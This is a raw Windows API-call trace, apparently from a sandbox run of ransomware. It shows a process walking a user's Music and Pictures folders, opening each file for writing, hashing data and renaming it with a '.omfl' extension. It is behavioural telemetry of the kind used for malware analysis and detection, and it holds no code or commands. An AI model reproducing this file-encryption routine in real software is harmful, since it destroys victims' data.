CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0133.924] GetLastError () returned 0x0 [0133.924] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0133.924] CryptReleaseContext (hProv=0x49d1c58, dwFlags=0x0) returned 1 [0133.924] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0133.924] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0133.924] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0133.924] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0133.924] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0133.926] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\H9ZDOLsEHsUNLx\\owBp0zmdV.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\h9zdolsehsunlx\\owbp0zmdv.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\H9ZDOLsEHsUNLx\\owBp0zmdV.m4a.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\h9zdolsehsunlx\\owbp0zmdv.m4a.omfl")) returned 1 [0133.926] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74fb288 | out: hHeap=0x4970000) returned 1 [0133.926] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0133.926] VirtualFree (lpAddress=0x6ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.928] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74bf9a0 | out: hHeap=0x4970000) returned 1 [0133.928] FindNextFileW (in: hFindFile=0xdce3b70, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d51a660, ftCreationTime.dwHighDateTime=0x1d5da65, ftLastAccessTime.dwLowDateTime=0x48e26e80, ftLastAccessTime.dwHighDateTime=0x1d5e524, ftLastWriteTime.dwLowDateTime=0x48e26e80, ftLastWriteTime.dwHighDateTime=0x1d5e524, nFileSizeHigh=0x0, nFileSizeLow=0x16067, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="QNxvvmKx.mp3", cAlternateFileName="")) returned 1 [0133.928] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\H9ZDOLsEHsUNLx\\QNxvvmKx.mp3") returned=".mp3" [0133.928] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\H9ZDOLsEHsUNLx\\QNxvvmKx.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\h9zdolsehsunlx\\qnxvvmkx.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0133.928] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=90215) returned 1 [0133.928] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0133.932] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d1c58) returned 1 [0133.933] CryptCreateHash (in: hProv=0x49d1c58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0133.933] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0133.933] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0133.933] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0133.933] GetLastError () returned 0x0 [0133.933] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0133.933] CryptReleaseContext (hProv=0x49d1c58, dwFlags=0x0) returned 1 [0133.933] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0133.933] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0133.933] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0133.934] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0133.934] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0133.935] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\H9ZDOLsEHsUNLx\\QNxvvmKx.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\h9zdolsehsunlx\\qnxvvmkx.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\H9ZDOLsEHsUNLx\\QNxvvmKx.mp3.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\h9zdolsehsunlx\\qnxvvmkx.mp3.omfl")) returned 1 [0133.937] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74fb288 | out: hHeap=0x4970000) returned 1 [0133.937] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0133.937] VirtualFree (lpAddress=0x6ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.938] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74bf9a0 | out: hHeap=0x4970000) returned 1 [0133.938] FindNextFileW (in: hFindFile=0xdce3b70, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x123095a0, ftCreationTime.dwHighDateTime=0x1d5de0e, ftLastAccessTime.dwLowDateTime=0xe23f1be0, ftLastAccessTime.dwHighDateTime=0x1d5e0ca, ftLastWriteTime.dwLowDateTime=0xe23f1be0, ftLastWriteTime.dwHighDateTime=0x1d5e0ca, nFileSizeHigh=0x0, nFileSizeLow=0x16cce, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="r7EAI38u01o9vtj9f3n.mp3", cAlternateFileName="R7EAI3~1.MP3")) returned 1 [0133.938] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\H9ZDOLsEHsUNLx\\r7EAI38u01o9vtj9f3n.mp3") returned=".mp3" [0133.938] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\H9ZDOLsEHsUNLx\\r7EAI38u01o9vtj9f3n.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\h9zdolsehsunlx\\r7eai38u01o9vtj9f3n.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0133.938] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=93390) returned 1 [0133.939] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0133.942] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d1c58) returned 1 [0133.943] CryptCreateHash (in: hProv=0x49d1c58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0133.943] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0133.943] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0133.943] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0133.943] GetLastError () returned 0x0 [0133.943] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0133.943] CryptReleaseContext (hProv=0x49d1c58, dwFlags=0x0) returned 1 [0133.943] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0133.943] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0133.943] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0133.944] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0133.944] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0133.945] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\H9ZDOLsEHsUNLx\\r7EAI38u01o9vtj9f3n.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\h9zdolsehsunlx\\r7eai38u01o9vtj9f3n.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\H9ZDOLsEHsUNLx\\r7EAI38u01o9vtj9f3n.mp3.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\h9zdolsehsunlx\\r7eai38u01o9vtj9f3n.mp3.omfl")) returned 1 [0133.946] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74fb288 | out: hHeap=0x4970000) returned 1 [0133.946] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0133.946] VirtualFree (lpAddress=0x6ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.947] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74bf9a0 | out: hHeap=0x4970000) returned 1 [0133.948] FindNextFileW (in: hFindFile=0xdce3b70, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2fff1740, ftCreationTime.dwHighDateTime=0x1d5e50d, ftLastAccessTime.dwLowDateTime=0x29b5d020, ftLastAccessTime.dwHighDateTime=0x1d5deac, ftLastWriteTime.dwLowDateTime=0x29b5d020, ftLastWriteTime.dwHighDateTime=0x1d5deac, nFileSizeHigh=0x0, nFileSizeLow=0x1485, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="T4eSsYk.mp3", cAlternateFileName="")) returned 1 [0133.948] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\H9ZDOLsEHsUNLx\\T4eSsYk.mp3") returned=".mp3" [0133.948] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\H9ZDOLsEHsUNLx\\T4eSsYk.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\h9zdolsehsunlx\\t4essyk.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0133.948] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=5253) returned 1 [0133.948] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0133.951] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d1c58) returned 1 [0133.952] CryptCreateHash (in: hProv=0x49d1c58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0133.952] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0133.952] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0133.952] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0133.952] GetLastError () returned 0x0 [0133.952] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0133.952] CryptReleaseContext (hProv=0x49d1c58, dwFlags=0x0) returned 1 [0133.952] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0133.952] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0133.952] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0133.953] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0133.953] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0133.953] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\H9ZDOLsEHsUNLx\\T4eSsYk.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\h9zdolsehsunlx\\t4essyk.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\H9ZDOLsEHsUNLx\\T4eSsYk.mp3.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\h9zdolsehsunlx\\t4essyk.mp3.omfl")) returned 1 [0133.954] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74fb288 | out: hHeap=0x4970000) returned 1 [0133.954] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0133.954] VirtualFree (lpAddress=0x6ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.955] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74bf9a0 | out: hHeap=0x4970000) returned 1 [0133.955] FindNextFileW (in: hFindFile=0xdce3b70, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3b73fcf0, ftCreationTime.dwHighDateTime=0x1d5e54c, ftLastAccessTime.dwLowDateTime=0xd8eb4740, ftLastAccessTime.dwHighDateTime=0x1d5e295, ftLastWriteTime.dwLowDateTime=0xd8eb4740, ftLastWriteTime.dwHighDateTime=0x1d5e295, nFileSizeHigh=0x0, nFileSizeLow=0x17ff8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VSFgds.m4a", cAlternateFileName="")) returned 1 [0133.956] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\H9ZDOLsEHsUNLx\\VSFgds.m4a") returned=".m4a" [0133.956] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\H9ZDOLsEHsUNLx\\VSFgds.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\h9zdolsehsunlx\\vsfgds.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0133.956] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=98296) returned 1 [0133.956] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0133.959] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d1c58) returned 1 [0133.961] CryptCreateHash (in: hProv=0x49d1c58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0133.961] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0133.961] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0133.961] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0133.961] GetLastError () returned 0x0 [0133.961] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0133.961] CryptReleaseContext (hProv=0x49d1c58, dwFlags=0x0) returned 1 [0133.961] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0133.961] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0133.961] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0133.961] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0133.961] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0133.963] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\H9ZDOLsEHsUNLx\\VSFgds.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\h9zdolsehsunlx\\vsfgds.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\H9ZDOLsEHsUNLx\\VSFgds.m4a.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\h9zdolsehsunlx\\vsfgds.m4a.omfl")) returned 1 [0133.964] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74fb288 | out: hHeap=0x4970000) returned 1 [0133.964] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0133.964] VirtualFree (lpAddress=0x6ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.965] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74bf9a0 | out: hHeap=0x4970000) returned 1 [0133.965] FindNextFileW (in: hFindFile=0xdce3b70, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x30841fd0, ftCreationTime.dwHighDateTime=0x1d5dd38, ftLastAccessTime.dwLowDateTime=0xb8fb2e70, ftLastAccessTime.dwHighDateTime=0x1d5d983, ftLastWriteTime.dwLowDateTime=0xb8fb2e70, ftLastWriteTime.dwHighDateTime=0x1d5d983, nFileSizeHigh=0x0, nFileSizeLow=0x68f0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_hi8JsuSGzE61s7Dp.wav", cAlternateFileName="_HI8JS~1.WAV")) returned 1 [0133.966] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\H9ZDOLsEHsUNLx\\_hi8JsuSGzE61s7Dp.wav") returned=".wav" [0133.966] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\H9ZDOLsEHsUNLx\\_hi8JsuSGzE61s7Dp.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\h9zdolsehsunlx\\_hi8jsusgze61s7dp.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0133.966] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=26864) returned 1 [0133.966] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0133.969] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d1c58) returned 1 [0133.970] CryptCreateHash (in: hProv=0x49d1c58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0133.970] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0133.970] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0133.970] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0133.970] GetLastError () returned 0x0 [0133.970] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0133.970] CryptReleaseContext (hProv=0x49d1c58, dwFlags=0x0) returned 1 [0133.970] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0133.970] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0133.970] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0133.971] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0133.971] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0133.971] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\H9ZDOLsEHsUNLx\\_hi8JsuSGzE61s7Dp.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\h9zdolsehsunlx\\_hi8jsusgze61s7dp.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\H9ZDOLsEHsUNLx\\_hi8JsuSGzE61s7Dp.wav.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\h9zdolsehsunlx\\_hi8jsusgze61s7dp.wav.omfl")) returned 1 [0133.972] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74fb288 | out: hHeap=0x4970000) returned 1 [0133.972] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0133.972] VirtualFree (lpAddress=0x6ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.973] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74bf9a0 | out: hHeap=0x4970000) returned 1 [0133.973] FindNextFileW (in: hFindFile=0xdce3b70, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x30841fd0, ftCreationTime.dwHighDateTime=0x1d5dd38, ftLastAccessTime.dwLowDateTime=0xb8fb2e70, ftLastAccessTime.dwHighDateTime=0x1d5d983, ftLastWriteTime.dwLowDateTime=0xb8fb2e70, ftLastWriteTime.dwHighDateTime=0x1d5d983, nFileSizeHigh=0x0, nFileSizeLow=0x68f0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_hi8JsuSGzE61s7Dp.wav", cAlternateFileName="_HI8JS~1.WAV")) returned 0 [0133.974] FindClose (in: hFindFile=0xdce3b70 | out: hFindFile=0xdce3b70) returned 1 [0133.974] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750ca80 | out: hHeap=0x4970000) returned 1 [0133.974] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74d2e60 | out: hHeap=0x4970000) returned 1 [0133.974] PeekMessageW (in: lpMsg=0xe00ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00ff08) returned 0 [0133.974] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0133.974] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\94ItO\\") returned="94ItO\\" [0133.974] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="Pictures\\" [0133.974] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0133.974] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0133.974] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8f58 | out: hHeap=0x4970000) returned 1 [0133.974] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0133.974] PathFindFileNameW (pszPath="") returned="" [0133.975] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\94ItO\\8IWIbAU.bmp") returned=".bmp" [0133.975] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\94ItO\\8IWIbAU.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\94ito\\8iwibau.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0133.975] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=41269) returned 1 [0133.975] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0133.979] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d1c58) returned 1 [0133.980] CryptCreateHash (in: hProv=0x49d1c58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0133.980] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0133.980] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0133.980] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0133.980] GetLastError () returned 0x0 [0133.980] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0133.980] CryptReleaseContext (hProv=0x49d1c58, dwFlags=0x0) returned 1 [0133.980] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0133.980] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0133.980] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0133.980] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0133.980] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0133.981] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\94ItO\\8IWIbAU.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\94ito\\8iwibau.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\94ItO\\8IWIbAU.bmp.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\94ito\\8iwibau.bmp.omfl")) returned 1 [0133.982] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74fb288 | out: hHeap=0x4970000) returned 1 [0133.982] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0133.982] VirtualFree (lpAddress=0x6ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 